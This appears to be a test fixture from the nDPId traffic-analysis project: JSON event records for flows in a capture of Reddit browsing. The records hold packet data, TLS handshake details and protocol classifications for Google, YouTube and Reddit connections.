+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688830,"flow_last_seen":1605291688830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688830,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605291688830,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688830,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5AAAAAAoAL9IFwjAAACBAWgBAIICu7gTZEAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688831,"flow_last_seen":1605291688831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688831,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605291688831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688831,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+wAAAAAoAL9IM9TAAACBAWgBAIICkSadMcAAAAAAQMDBw=="} 
+00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/oAAAAAoAL9IC3PAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdYAAAAAoAL9IPghAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4xvp17E2f1af7oBJXgOZHAAACBAV4AQMDAwQCCArC10OnN\/P3eA=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4yD8lZERbpSHXoBJXgPP1AAACBAV4AQMDAwQCCArC10OmN\/P3eA=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4820,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/v6dexOgBAB+2orAAABAQgKN\/P3psLXQ6c="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4821,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdc\/JWRFgBAB+3fZAAABAQgKN\/P3psLXQ6Y="} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4856,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605291688893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688893,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvjCkXQfikiqr+RoBJXgDd0AAACBAV4AQMDAwQCCArC10OZ7uBNkQ=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1605291688893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688893,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5FF0H4qgBAB+7tFAAABAQgK7uBN0cLXQ5k="} 
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4865,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605291688894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688894,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgVAAAAAAAAIBYqAcsBIEmLB5kd7IUo3\/YpAbvMSCvRvaZMy7vtoBJXgIUlAAACBAV4AQMDAwQCCArC10OaRJp0xw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4867,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605291688894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688894,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+0r0b2ngBAB+wj4AAABAQgKRJp1BsLXQ5o="} 
+00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291689408,"flow_last_seen":1605291689408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291689408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605291689408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689408,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYYAAAAAoAL9IMRnAAACBAWgBAIICql08xMAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7110,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605291689433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689433,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ86cETj6GHoBJXgAFCAAACBAV4AQMDAwQCCArC10XLqXTzEw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7111,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605291689433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291689433,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYd2fOnCgBAB+4U5AAABAQgKqXTzLcLXRcs="} 
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690373,"flow_last_seen":1605291690373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690373,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605291690373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690373,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2UAAAAAoAL9IFr7AAACBAWgBAIIClRf7UgAAAAAAQMDBw=="} 